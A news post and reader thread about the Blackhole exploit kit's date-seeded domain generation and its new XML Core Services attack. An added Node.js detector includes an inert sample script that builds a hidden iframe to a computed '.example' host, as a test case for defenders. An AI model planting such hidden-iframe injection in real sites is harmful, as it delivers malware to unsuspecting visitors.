Blackhole Exploit Kit Gets an Upgrade
wiredmikey writes "The popular Blackhole exploit kit, assumed to be created and maintained by an individual going by the online moniker of 'Paunch,' who continuously updates the browser exploit software, looks like it has just received another upgrade. The exploit works by infecting a user when they visit a Blackhole-infected site, and their browser runs the JavaScript code, usually via a hidden iframe. If the location or URL for the malicious iframe changes or is taken down, all of the compromised sites will have to be updated to point to this new location, making it hard for the attackers. To deal with this, the Blackhole JavaScript code on compromised sites now dynamically generates pseudo-random domains, based on the date and other information, and then creates an iframe pointing to the generated domain. Moreover, the kit's recent upgrade also added a new attack. According to Sophos, sometime in early June Blackhole was updated to include an attack that targets a flaw in Microsoft's XML Core Services, which remains unpatched. Unfortunately, the changes prove once again that the criminal economy online is alive and well."
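The injection pattern described in the summary above (a date-derived domain, then a dynamically created iframe) leaves a recognizable shape in the source of a compromised page. As an added example that is not part of the original post or thread, the following Node.js code scans inline scripts for that combination; the function name, the indicator set and both sample pages are constructed, and `seedToName` is a placeholder that is never executed.

```javascript
// Added example: static heuristic for date-seeded hidden-iframe injection.
// Function names and both sample pages are constructed for illustration.
const INDICATORS = {
  usesDate: /new\s+Date\s*\(|Date\.now\s*\(|\.get(?:UTC)?(?:FullYear|Month|Date|Day)\s*\(/,
  createsIframe: /createElement\s*\(\s*['"]iframe['"]\s*\)|<iframe\b/i,
  // .src assigned from an expression rather than a single string literal
  dynamicSrc: /\.src\s*=(?!=)(?!\s*(['"])[^'"]*\1\s*(?:;|$))/m,
  hidesFrame: /display\s*[:=]\s*['"]?none|visibility\s*[:=]\s*['"]?hidden|(?:width|height)\s*=\s*['"]?[01]\b/i,
};

// Return one finding per inline <script>, listing which indicators matched.
function scanPage(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m, index = 0;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(body));
    // The pattern from the summary needs all three: a date input, an iframe,
    // and a frame URL that is computed instead of hard-coded.
    const suspicious = ["usesDate", "createsIframe", "dynamicSrc"].every((k) => hits.includes(k));
    findings.push({ index: index++, hits, suspicious, hidden: hits.includes("hidesFrame") });
  }
  return findings;
}

// Constructed sample: a date in one script, a fixed-URL video embed in another.
const BENIGN_PAGE = `
<script>document.getElementById("year").textContent = new Date().getFullYear();</script>
<script>
  var v = document.createElement("iframe");
  v.src = "https://player.example/embed/1";
  document.body.appendChild(v);
</script>`;

// Constructed sample: shape of an injected script; seedToName is a placeholder, never run.
const INJECTED_PAGE = `
<script>
  var d = new Date();
  var host = seedToName(d.getUTCFullYear(), d.getUTCMonth(), d.getUTCDate()) + ".example";
  var f = document.createElement("iframe");
  f.style.visibility = "hidden";
  f.src = "http://" + host + "/";
  document.body.appendChild(f);
</script>`;

console.log(JSON.stringify(scanPage(BENIGN_PAGE)));
console.log(JSON.stringify(scanPage(INJECTED_PAGE)));
```

Obfuscated scripts hide these tokens, so a static match like this complements rendering the page in an instrumented sandbox and logging the frames it creates.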
Firefox + NoScript (Score:4, Insightful)
Problem fecking solved. Nobody should be running without a script blocker in this day and age.
Before a knee jerk posts... (Score:5, Insightful)
Before a knee jerk posts "I use NoScript -- I'm safe!"...
This doesn't mean that JavaScript is insecure. It just means there's an exploitable unpatched vulnerability in JS in some browser. The fact that this malware uses JavaScript + iframe doesn't mean JavaScript is inherently insecure or less secure than bare HTML.
And now the worst news of all for you: the HTML engine (or any other portion) of the browser can and often does contain exploitable unpatched vulnerabilities. So even if you disable JavaScript you can get infected.
The bottom line: the best way to protect yourself is to honor the following three golden rules:
1. Keep your browser and OS updated with security fixes.
2. Don't visit suspicious websites and don't open suspicious email attachments.
3. Use a good antivirus that monitors your internet traffic.
Profit?
Re:Before a knee jerk posts... (Score:5, Insightful)
You don't know how plugins work with modern browsers. Please stop pretending that you do.
Without the JS redirect, there is no avenue for infection. Period. NoScript will stop this, properly configured. Period. Because of the nature of the kit, most antivirus products WILL NOT protect you from the threat. Period.
Yes, this particular exploit (and any other JS based exploits, probably). Guy you are replying to said that while NoScript might protect you from JS based exploits, it does not protect you from exploits that target elements not affected by NoScript or exploits aimed at NoScript itself.
The internet is a dangerous place, sometimes bad stuff slips through the cracks. There isn't a silver bullet solution that will keep you 100% safe 100% of the time.
Re:Firefox + NoScript (Score:0, Insightful)
The evidence anything executable is unsafe cannot be disputed.
FTFY. That includes JS, NPAPI, ActiveX, NaCl and whatever somebody will think up next.
I've turned JS off in my Opera (can whitelist individual sites through F12 - Site preferences - Scripting), and plugins are configured to run on click.
Re:Before a knee jerk posts... (Score:3, Insightful)
How do you know you have never had an infection if you don't occasionally scan? Exploits for Linux-based systems have been found in the wild before -- Red Hat releases patches on an almost daily basis. You are certainly /more/ secure than a Windows user, but the only truly secure system is the one without both power and network connectivity. You are advocating a poor security posture by suggesting that Linux users need not worry about infection.
Re:Before a knee jerk posts... (Score:4, Insightful)
Funny, I often wonder how so many people can view the WWW without NoScript installed! Zooming up fake windows, continually scrolling sidebars, attack ads, "do you want to chat with a representative online" boxes, it seems like there are usually about three things to dismiss before even uncovering most content.
However, I'd certainly agree that NoScript is not for the uninitiated. It doesn't pass the mom test, or even the wife test. Most people just want things to work, and are willing to put up with whatever crap they're served in order to get it. I'm willing to view the static content, and if there's something deeper to explore, I understand up front that I might have to whitelist a few things to get it to work. Note that you can configure NoScript to automatically permit scripts originating from "base 2nd level domains" (i.e. allow everything from *.foobar.com when you're on www.foobar.com), which generally enables local content to work just fine, while still preventing XSS nonsense. The only place where I commonly run into trouble is with video content, as it's generally hosted somewhere else like Vimeo or YouTube, and with third party SSO providers like Yahoo. In all, over many years of browsing I've added some margin of trust for about a hundred sites which seem to have taken care of most of those issues.
Re:Firefox + NoScript (Score:5, Insightful)
If you run NoScript, essentially every web site in existence is broken by default and has to be whitelisted. If you get into the habit of auto-allowing everything, you're no safer than you would be without it installed, and if you don't, then you have to manually spend 5 minutes picking and choosing which scripts you have to enable for the page to work.